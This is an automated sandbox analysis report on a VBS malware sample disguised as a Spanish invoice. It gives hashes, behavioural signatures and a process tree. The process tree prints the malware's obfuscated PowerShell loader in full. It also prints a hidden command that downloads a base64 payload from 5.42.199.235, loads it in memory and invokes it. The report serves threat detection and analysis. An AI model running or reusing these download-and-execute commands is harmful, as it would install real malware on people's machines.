Analysis
-
max time kernel
29s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
30/03/2023, 07:12
Static task
static1
Behavioral task
behavioral1
Sample
Factura por pagar N comprobante electronico 005001000603211.vbs
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Factura por pagar N comprobante electronico 005001000603211.vbs
Resource
win10v2004-20230220-en
General
-
Target
Factura por pagar N comprobante electronico 005001000603211.vbs
-
Size
912KB
-
MD5
2c9e2087047f7eb65a42a31a8407b6d7
-
SHA1
3686d693284171f624a9ecfaa8e0ec20cfc67791
-
SHA256
da9f30f6467709340226de7f1e28a62620a6939ed92a60b524dc57e8b486d807
-
SHA512
6d87c5f1098e9da24df1c090f69be76f26e321437cb8cfd4aec3d6faafd97a37b86d2761f4d12f00e6e098512009d2e8ff62eedf7a2103db42ce223416361731
-
SSDEEP
6144:8WkHWkXWkHWk3WkHWkCWkHWkxWkHWk0WkHWknWkHWk8WkHWkDWkHWkEWkHWkkWkL:x
Malware Config
Extracted
http://5.42.199.235/dll/dll3.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 828 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 864 powershell.exe 1672 powershell.exe 828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe Token: SeDebugPrivilege 828 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2024 wrote to memory of 864 2024 WScript.exe 27 PID 2024 wrote to memory of 864 2024 WScript.exe 27 PID 2024 wrote to memory of 864 2024 WScript.exe 27 PID 2024 wrote to memory of 1672 2024 WScript.exe 30 PID 2024 wrote to memory of 1672 2024 WScript.exe 30 PID 2024 wrote to memory of 1672 2024 WScript.exe 30 PID 1672 wrote to memory of 828 1672 powershell.exe 32 PID 1672 wrote to memory of 828 1672 powershell.exe 32 PID 1672 wrote to memory of 828 1672 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura por pagar N comprobante electronico 005001000603211.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAaoUWkAIAA9ACAAJwBaoUWAGkAcQBaoUWACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AaoUWMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAaoUWMAZQA2ADQAUwB0AaoUWIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAaoUWQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AaoUWIAaQBuAGcAKAAnAGgAdAB0AaoUWAAOgAvAC8ANQAuADQAMgAuADEAOQA5AC4AMgAzADUALwBkAGwAbAAvAGQAbABsADMALgB0AaoUWgAdAAnACkAKQA7AFsAcwB5AaoUWMAdABlAG0ALgBBAaoUWAAcABEAG8AbQBhAGkAbgBdADoAOgBDAaoUWUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAGUAKAAnAEMAZABXAEQAZABCAC4ARABLAGUAUwB2AGwAJwApAC4ARwBlAaoUWQATQBlAaoUWQAaABvAGQAKAAnAE4AbgBJAGEAVQBxACcAKQAuAEkAbgB2AG8AawBlACgAJABuAaoUWUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAKAAnADAALwBpAEUANwBqAE4ALwBkAC8AZQBlAC4AZQB0AaoUWMAYQBwAC8ALwA6AaoUWMAcAB0AaoUWQAaAAnACAALAAgACQAUgBvAGQAYQBDAG8AcAB5ACAALAAgACcARQBZAGoAQwAnACwAIAAnADAAJwAsACAAJwAxACcALAAgACcAJwAgACkAKQA=';$pvNxls = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('aoUW','H') ) );$pvNxls = $pvNxls.replace('GiqG', 'C:\Users\Admin\AppData\Local\Temp\Factura por pagar N comprobante electronico 005001000603211.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $pvNxls2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Factura por pagar N comprobante electronico 005001000603211.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://5.42.199.235/dll/dll3.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('0/iE7jN/d/ee.etsap//:sptth' , $RodaCopy , 'EYjC', '0', '1', '' ))"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD588fe708249f98cf20a5f07ab16f0e60d
SHA1e13f438193a9905a5733fb219c95a123cd16c307
SHA2566506cbd91e1f98a059f2eaa4785c27012b89abaa5994bc6a4cc965e3203c7fdd
SHA512d9116fa45525aba80f9166bb572150e86139087e4d3c1b97b8c4c3d50b2e3af06392b087bee1b91fa61879171b36e14b4dd1341c5fa9162f1261fa9b462121e7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD588fe708249f98cf20a5f07ab16f0e60d
SHA1e13f438193a9905a5733fb219c95a123cd16c307
SHA2566506cbd91e1f98a059f2eaa4785c27012b89abaa5994bc6a4cc965e3203c7fdd
SHA512d9116fa45525aba80f9166bb572150e86139087e4d3c1b97b8c4c3d50b2e3af06392b087bee1b91fa61879171b36e14b4dd1341c5fa9162f1261fa9b462121e7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXDNZ4YMP6OYXYQB2SGS.temp
Filesize7KB
MD588fe708249f98cf20a5f07ab16f0e60d
SHA1e13f438193a9905a5733fb219c95a123cd16c307
SHA2566506cbd91e1f98a059f2eaa4785c27012b89abaa5994bc6a4cc965e3203c7fdd
SHA512d9116fa45525aba80f9166bb572150e86139087e4d3c1b97b8c4c3d50b2e3af06392b087bee1b91fa61879171b36e14b4dd1341c5fa9162f1261fa9b462121e7